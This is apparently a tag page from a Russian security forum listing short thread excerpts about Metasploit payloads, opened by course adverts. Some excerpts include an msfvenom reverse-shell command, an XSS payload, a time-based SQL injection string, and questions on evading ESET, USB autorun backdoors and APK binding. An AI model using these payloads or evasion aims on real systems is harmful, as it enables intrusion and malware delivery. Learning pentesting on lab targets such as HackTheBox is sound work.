• 4 июля стартует курс «Python для Пентестера ©» от команды The Codeby

    Понятные и наглядные учебные материалы с информацией для выполнения ДЗ; Проверка ДЗ вручную – наставник поможет улучшить написанный вами код; Помощь преподавателей при выполнении заданий или в изучении теории; Групповой чат в Telegram с другими учениками, проходящими курс; Опытные разработчики – команда Codeby School, лидер по информационной безопасности в RU-сегменте

    Запись на курс до 15 июля. Подробнее ...

  • 11 июля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 20 июля. Подробнее ...

payload

  1. L

    Kali, vmware, NAT and Metasploit

    Добрый день. Столкнулся с проблемой создания tcp тоннеля в metasploit. Имеется Компания Б, с подсетью 192.168.0.0/24 и подсетью VPN 172.1.1.0/24. VPN построен на Checkpoint. С моей стороны на компе Win 10 и установленным VPN соединением с компанией Б по VPN выдан ip 172.1.1.5 и видная вся...
  2. S

    проблема с metasploit exploit/multi/handler

    Доброго времени суток, форумчане. Я столкнулся с проблемой, при пинтесте машины Love на платформе HackTheBox. Суть в том, что мне нужно получить удаленный доступ, через полезную нагрузку и metasploit. Вот как я это делал: msfvenom -p windows/meterpreter/reverse_tcp lport=1234 lhost=[myip] -f exe...
  3. A

    Metasploit: не могу отправить ни один эксплойт

    Пытаюсь пройти первую машину на Hack The Box. Hack The Box :: Penetration Testing Labs С помощью Gobuster вытащил файл, где сказано что сервер сделан на Drupal (Linux) Ну я давай искать в metasploit подходящий эксплоит, чего я только не пробовал - все одно и тоже. Как я понимаю, наиболее...
  4. Matthew Tsyb

    Флэшка вирус backdoor через msf

    Здравствуйте дорогие форумчане, у меня вопрос как на флешку скинуть готовый backdoor сделанный через msfvenom на kali Чтобы при подключении её (флешки) к пк запускался пэйлоад Заранее всех благодарю
  5. mcfly

    Мета я тебя I Love

  6. mrtyrel

    Обход фильтрации form email

    Проверка валидности email в форме ввода создания аккаунта Например validate/email?address= // payload - " ¼script¾alert(¢XSS¢)¼/script¾ " Проблема - мыло не проходит проверку на валидность Запрещенные символы : ; <> \ " () Вопрос есть ли способы обойти такую фильтрацию?
  7. alice_killer

    Payload Bypassing Eset

    Здравствуйте, попробовала создать пэйлойд используя Msfvenom и зашифровала шифром ShikatGaNai, в общем смогла скрыть от Avast, но ESET жестко палит, собственно прошу вас ответить на следующий вопрос: как скрыть пэйлоуд от антивируса ESET? если можно опишите пожалуйста более подробно. P.S...
  8. qwertyytrewq1

    Как получать соединения вне локальной сети «Fat Rat» (Kali Linux) ?

    Собственно, суть вопроса в заголовке: Как получать соединения от юзера, который находится вне локальной сети?
  9. G

    Как sqlmap заставить использовать мой payload

    Здравствуйте. Как sqlmap заставить использовать мой payload. Есть пайлоад, к примеру: )))/**/WAITFOR/**/DELAY/**/'0:0:5'/**/AND/**/(((8226=8226 под него с помощью atlas подобрал tamper space2randomblank как мне заставить sqlmap использовать именно этот пайлоад, а не перебирать свои?
  10. Zer0must2b

    apk fatrat - как подписан установленный пейлоад apk в android системе?

    а как подписан установленый пейлоад apk в android системе,имею ввиду com.android и тд. может кто знает?
  11. Admin80

    Shellter и exe

    Никак не пойму как прикрутить в Shellter свой payload в формате exe может кто сталкивался?
  12. Vertigo

    Soft Pixload: вредоносный скрипт в изображении

    Добрый день,Уважаемые Форумчане и Друзья. Когда-то стали известны способы размещения вредоносного кода в изображении. Немногим позднее появилась атака Polyglot,когда вредоносный файл одновременно является изображением и JavaScript-кодом. В основном,это касалось файлов BMP,при этом,2 первых...
  13. O

    Payload FUD + Metasploit???

    Привет Кодебай! Какие генераторы актуальны сейчас? (FatRat, Veil, Shellter не предлогать, паляться) и как прикрутить этот пэйлоад к эксплоиту ms17-10 в metasploit?
  14. F

    Склейка Metasploit payload с apk

    Доброго времени суток всем! На днях поставил Metasploit в Termux. При попытке добавить payload в уже существующий apk Metasploit пожаловался на отсутствие Zipalign. Нашёл много разных версий, но под aarch64 не было не одной. Буду благодарен за помощь в решении данного вопроса.
  15. P

    Умирает сессия при попытке портскана

    Сессия windows/meterpreter/reverse_tcp умирает при попытке портскана сети через proxy pivot. Т.е. пейлоад крашится на таргет хосте при большом кол-ве TCP соединений. В случае с reverse_http такого не происходит, но скорость скана очень низкая. Есть какое-то решение этой проблемы? Буду премного...
  16. kombat

    Не получается создать сессию

    Exploit completed, but no session was created. Не получается создать сессию подскажите что делать ?? Гуглил там на не которых формуах говорили то что надо открыть порт, но порт открыть тоже не выходит ((
  17. Tayrus

    Статья C2 с использованием DNS по HTTPS (DoH)

    Постоянный доступ к сети цели является одним из основных этапов в любой наступательной операции. Во время нашей деятельности мы используем различные типы маяков для повседневных операций. При сбое всех маяков они могут восстановить доступ к сети цели. Таким образом, маяк должен...
  18. kombat

    И снова Metasploit (Payload)

    И снова у меня проблемы с полезной нагрузкой на этот раз выбрал нужный эксплойт и нужную нагрузку но что то пошло не так Подскажите что я делаю не так ?!
  19. kombat

    Metasploit (Failed to load module: payload)

    Не могу подобрать полезную нагрузку,какую только не ставлю пишет не удалось подключить модуль,помогите решить проблему и подскажите как подбирать полезные нагрузки на ОС
  20. R

    Проблема EternalBlue. Did not receive a response from exploit packet.

    Помогите пожалуйста, почему возникает эта ошибка? Можно ли как-то от нее избавиться, и если можно, то как?